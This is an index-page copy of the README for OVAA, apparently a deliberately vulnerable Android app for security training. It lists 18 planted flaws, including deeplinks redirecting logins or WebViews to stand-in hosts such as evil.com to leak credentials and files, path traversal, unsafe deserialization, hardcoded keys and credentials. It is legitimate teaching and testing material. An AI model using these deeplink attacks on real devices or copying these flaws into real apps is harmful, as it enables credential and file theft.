Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/oversecured/ovaa

Oversecured Vulnerable Android App
https://github.com/oversecured/ovaa

android-security appsec mobile-security vulnerable-android-apps vulnerable-application

Last synced: about 1 month ago
JSON representation

Oversecured Vulnerable Android App

Lists

README

        

## Description
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.

## List of vulnerabilities
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on [our blog](https://blog.oversecured.com/).

1. Installation of an arbitrary `login_url` via deeplink `oversecured://ovaa/login?url=http://evil.com/`. Leads to the user's user name and password being leaked when they log in.
2. Obtaining access to arbitrary content providers (not exported, but with the attribute `android:grantUriPermissions="true"`) via deeplink `oversecured://ovaa/grant_uri_permissions`. The attacker's app needs to process `oversecured.ovaa.action.GRANT_PERMISSIONS` and pass intent to `setResult(code, intent)` with flags such as `Intent.FLAG_GRANT_READ_URI_PERMISSION` and the URI of the content provider.
3. Vulnerable host validation when processing deeplink `oversecured://ovaa/webview?url=...`.
4. Opening arbitrary URLs via deeplink `oversecured://ovaa/webview?url=http://evilexample.com`. An attacker can use the vulnerable WebView setting `WebSettings.setAllowFileAccessFromFileURLs(true)` in the `WebViewActivity.java` file to steal arbitrary files by sending them XHR requests and obtaining their content.
5. Access to arbitrary activities and acquiring access to arbitrary content providers in `LoginActivity` by supplying an arbitrary Intent object to `redirect_intent`.
6. Theft of arbitrary files in `MainActivity` by intercepting an activity launch from `Intent.ACTION_PICK` and passing the URI to any file as data.
7. Insecure broadcast to `MainActivity` containing credentials. The attacker can register a broadcast receiver with action `oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA` and obtain the user's data.
8. Insecure activity launch in `MainActivity` with action `oversecured.ovaa.action.WEBVIEW`, containing the user's encrypted data in the query parameter `token`.
9. Deletion of arbitrary files via the insecure `DeleteFilesSerializable` deserialization object.
10. Memory corruption via the `MemoryCorruptionParcelable` object.
11. Memory corruption via the `MemoryCorruptionSerializable` object.
12. Obtaining read/write access to arbitrary files in `TheftOverwriteProvider` via path-traversal in the value `uri.getLastPathSegment()`.
13. Obtaining access to app logs via `InsecureLoggerService`. Leak of credentials in `LoginActivity` `Log.d("ovaa", "Processing " + loginData)`.
14. Use of the hardcoded AES key in `WeakCrypto`.
15. Arbitrary Code Execution in `OversecuredApplication` by launching code from third-party apps with no security checks.
16. Use of very wide file sharing declaration for `oversecured.ovaa.fileprovider` content provider in `root` entry.
17. Hardcoded credentials to a dev environment endpoint in `strings.xml` in `test_url` entry.
18. Arbitrary code execution via a DEX library located in a world-readable/writable directory.

---------------------------------------
*Licensed under the Simplified BSD License*

*Copyright (c) 2023, Oversecured Inc*

https://oversecured.com/